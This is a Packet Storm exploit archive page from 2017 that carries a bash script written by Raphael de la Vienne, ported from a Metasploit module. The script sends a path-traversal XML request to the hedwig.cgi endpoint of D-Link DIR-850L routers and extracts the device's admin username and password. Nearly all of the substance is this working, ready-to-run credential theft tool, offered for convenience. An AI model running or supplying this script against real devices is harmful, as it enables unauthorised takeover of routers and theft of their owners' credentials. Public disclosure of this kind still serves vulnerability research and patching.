Exploit the possiblities

D-Link DIR-850L Credential Disclosure

D-Link DIR-850L Credential Disclosure
Posted Nov 23, 2017
Authored by Pierre Kim, Zdenda, Raphael de la Vienne, Peter Geissler

D-Link DIR-850L remote code execution variant exploit that extracts username and password for the device.

tags | exploit, remote, code execution
MD5 | b4ca3f0d10a248730135ce2865102871

D-Link DIR-850L Credential Disclosure

Change Mirror Download
#!/bin/bash
#
# Derped together by Raphael de la Vienne A.K.A. Hackdwerg
# Original exploit https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec
# Just in case if you dont have metasploit, or are to lazy to install it. here is a bash variant.
#
# Exploit Title: dlink-850-admin-creds-retriever.sh
# Google Dork: none
# Date: 2017-11-23
# Exploit Author: Zdenda, Peter Geissler, Pierre Kim
# Ported to bash for the ease of use.
# Vendor Homepage: http://support.dlink.com/ProductInfo.aspx?m=DIR-850L
# Software Link: ftp://ftp2.dlink.com/PRODUCTS/DIR-850L/REVA/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP
# Version: 1.14.B07
# Tested on: mips
# SSV ID:SSV-96333
# CVE : none
# Original PoC: https://www.seebug.org/vuldb/ssvid-96333
# MSF module: https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec

# Vulnerability found in Hack2Win competition at securiteam
# URL: https://blogs.securiteam.com/index.php/archives/3364
# Credits go to Zdenda, Peter Geissler and Pierre Kim
# Recreated in bash by Hackdwerg
# Usage: enter ip when prompted, enter port when prompted.

#input IP
echo -e "Enter DLINK IP"
read IP
#input PORT
echo -e "Enter PORT number"
read PORT
#generate Random UID cookie
SET_COOKIE=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
#setting headers
HEADER1="User-Agent:Mozilla/4.0 (compatible; MSIE 5.5;Windows NT)"
HEADER2="Content-Type:text/xml"
HEADER3="Accept-Encoding:gzip, deflate"
HEADER4="Cookie:uid=$SET_COOKIE"
HEADER5="Connection:close"
#Build XML
XML_DATA="<?xml version='1.0' encoding='utf-8'?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>"
#Create POST with variables
POST=$(curl -s -X POST http://$IP:$PORT/hedwig.cgi -H "$HEADER1" -H "$HEADER2" -H "$HEADER3" -H "$HEADER4" -H "$HEADER5" -H "text/xml" -d "$XML_DATA")
OUT_RAW=$(echo $POST > Dlink-$IP-RAW.xml)
echo "output saved in: Dlink-$IP-RAW.xml"
#lazy solution for getting name and password. (if it works it aint stupid)
PRETTYFAIUSER=$(cat Dlink-$IP-RAW.xml | sed -e 's,.*<name>\([^<]*\)</name>.*,\1,g')
PRETTYFAIPASS=$(cat Dlink-$IP-RAW.xml | sed -e 's,.*<password>\([^<]*\)</password>.*,\1,g')

echo "Username =" $PRETTYFAIUSER
echo "Password =" $PRETTYFAIPASS
echo ""
echo "kthankxbye"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    3 Files
  • 17
    Dec 17th
    13 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close